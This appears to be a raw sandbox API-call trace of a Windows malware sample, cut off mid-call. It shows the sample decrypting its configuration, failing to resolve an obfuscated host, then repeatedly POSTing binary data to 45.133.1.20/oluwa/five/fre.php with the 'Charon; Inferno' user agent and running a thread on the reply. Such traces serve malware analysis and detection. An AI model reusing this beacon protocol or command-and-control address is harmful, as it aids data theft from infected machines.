[0279.655] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0279.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.656] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.665] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.665] GetProcessHeap () returned 0x6a0000 [0279.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0279.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.667] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0279.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.667] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0279.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.669] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0279.669] GetProcessHeap () returned 0x6a0000 [0279.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.671] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.672] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.673] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.674] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.674] GetProcessHeap () returned 0x6a0000 [0279.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0279.674] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0279.674] GetProcessHeap () returned 0x6a0000 [0279.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0279.675] GetProcessHeap () returned 0x6a0000 [0279.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.675] GetProcessHeap () returned 0x6a0000 [0279.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0279.675] GetProcessHeap () returned 0x6a0000 [0279.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0279.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.676] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.683] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0279.691] GetProcessHeap () returned 0x6a0000 [0279.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0279.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.693] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0279.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.694] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.697] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.697] GetProcessHeap () returned 0x6a0000 [0279.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0279.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.699] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0279.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.700] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0279.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.702] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0279.702] GetProcessHeap () returned 0x6a0000 [0279.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.703] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0279.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.704] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0279.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.722] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0279.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.723] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0279.723] GetProcessHeap () returned 0x6a0000 [0279.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0279.723] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0279.724] GetProcessHeap () returned 0x6a0000 [0279.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0279.724] socket (af=2, type=1, protocol=6) returned 0xa20 [0279.724] connect (s=0xa20, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0279.747] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0279.747] GetProcessHeap () returned 0x6a0000 [0279.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0279.747] GetProcessHeap () returned 0x6a0000 [0279.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0279.748] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.749] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0279.749] GetProcessHeap () returned 0x6a0000 [0279.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba230 [0279.749] GetProcessHeap () returned 0x6a0000 [0279.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0279.750] GetProcessHeap () returned 0x6a0000 [0279.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0279.750] GetProcessHeap () returned 0x6a0000 [0279.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0279.751] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.752] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0279.752] GetProcessHeap () returned 0x6a0000 [0279.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0279.752] GetProcessHeap () returned 0x6a0000 [0279.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0279.754] send (s=0xa20, buf=0x6bd460*, len=242, flags=0) returned 242 [0279.754] send (s=0xa20, buf=0x6bb998*, len=159, flags=0) returned 159 [0279.755] GetProcessHeap () returned 0x6a0000 [0279.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0279.755] recv (in: s=0xa20, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0279.822] GetProcessHeap () returned 0x6a0000 [0279.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0279.823] GetProcessHeap () returned 0x6a0000 [0279.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0279.824] GetProcessHeap () returned 0x6a0000 [0279.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba230 | out: hHeap=0x6a0000) returned 1 [0279.824] GetProcessHeap () returned 0x6a0000 [0279.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0279.824] closesocket (s=0xa20) returned 0 [0279.825] GetProcessHeap () returned 0x6a0000 [0279.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0279.825] GetProcessHeap () returned 0x6a0000 [0279.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.825] GetProcessHeap () returned 0x6a0000 [0279.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0279.826] GetProcessHeap () returned 0x6a0000 [0279.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0279.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17bc) returned 0xa20 [0279.828] Sleep (dwMilliseconds=0xea60) [0279.830] GetProcessHeap () returned 0x6a0000 [0279.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0279.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.831] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0279.845] GetProcessHeap () returned 0x6a0000 [0279.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c68d0 [0279.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.847] CryptImportKey (in: hProv=0x6befd0, pbData=0x6c68d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0279.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.848] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.849] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.849] GetProcessHeap () returned 0x6a0000 [0279.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c68d0 | out: hHeap=0x6a0000) returned 1 [0279.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.851] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0279.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.852] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0279.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.853] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0279.853] GetProcessHeap () returned 0x6a0000 [0279.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.854] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.855] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.861] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.862] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.862] GetProcessHeap () returned 0x6a0000 [0279.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0279.862] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0279.863] GetProcessHeap () returned 0x6a0000 [0279.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0279.864] GetProcessHeap () returned 0x6a0000 [0279.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.864] GetProcessHeap () returned 0x6a0000 [0279.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0279.865] GetProcessHeap () returned 0x6a0000 [0279.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0279.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.866] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.872] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0279.880] GetProcessHeap () returned 0x6a0000 [0279.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0279.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.882] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0279.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.883] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.884] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.884] GetProcessHeap () returned 0x6a0000 [0279.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0279.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.885] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0279.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.887] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0279.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.888] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0279.888] GetProcessHeap () returned 0x6a0000 [0279.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.889] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0279.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.890] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0279.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.891] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0279.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.893] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0279.893] GetProcessHeap () returned 0x6a0000 [0279.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0279.893] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0279.893] GetProcessHeap () returned 0x6a0000 [0279.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0279.893] socket (af=2, type=1, protocol=6) returned 0xa24 [0279.893] connect (s=0xa24, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0279.923] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0279.923] GetProcessHeap () returned 0x6a0000 [0279.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0279.923] GetProcessHeap () returned 0x6a0000 [0279.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0279.924] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.925] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0279.925] GetProcessHeap () returned 0x6a0000 [0279.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba6b0 [0279.925] GetProcessHeap () returned 0x6a0000 [0279.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0279.925] GetProcessHeap () returned 0x6a0000 [0279.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0279.926] GetProcessHeap () returned 0x6a0000 [0279.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0279.926] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.927] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0279.927] GetProcessHeap () returned 0x6a0000 [0279.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0279.927] GetProcessHeap () returned 0x6a0000 [0279.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0279.928] send (s=0xa24, buf=0x6bd460*, len=242, flags=0) returned 242 [0279.928] send (s=0xa24, buf=0x6bb998*, len=159, flags=0) returned 159 [0279.928] GetProcessHeap () returned 0x6a0000 [0279.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0279.929] recv (in: s=0xa24, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0280.006] GetProcessHeap () returned 0x6a0000 [0280.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0280.006] GetProcessHeap () returned 0x6a0000 [0280.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0280.007] GetProcessHeap () returned 0x6a0000 [0280.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba6b0 | out: hHeap=0x6a0000) returned 1 [0280.008] GetProcessHeap () returned 0x6a0000 [0280.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0280.008] closesocket (s=0xa24) returned 0 [0280.009] GetProcessHeap () returned 0x6a0000 [0280.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0280.009] GetProcessHeap () returned 0x6a0000 [0280.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.009] GetProcessHeap () returned 0x6a0000 [0280.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0280.009] GetProcessHeap () returned 0x6a0000 [0280.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0280.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17c0) returned 0xa24 [0280.012] Sleep (dwMilliseconds=0xea60) [0280.049] GetProcessHeap () returned 0x6a0000 [0280.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0280.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.057] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0280.066] GetProcessHeap () returned 0x6a0000 [0280.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0280.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.068] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0280.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.110] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.111] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.111] GetProcessHeap () returned 0x6a0000 [0280.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0280.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.113] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, 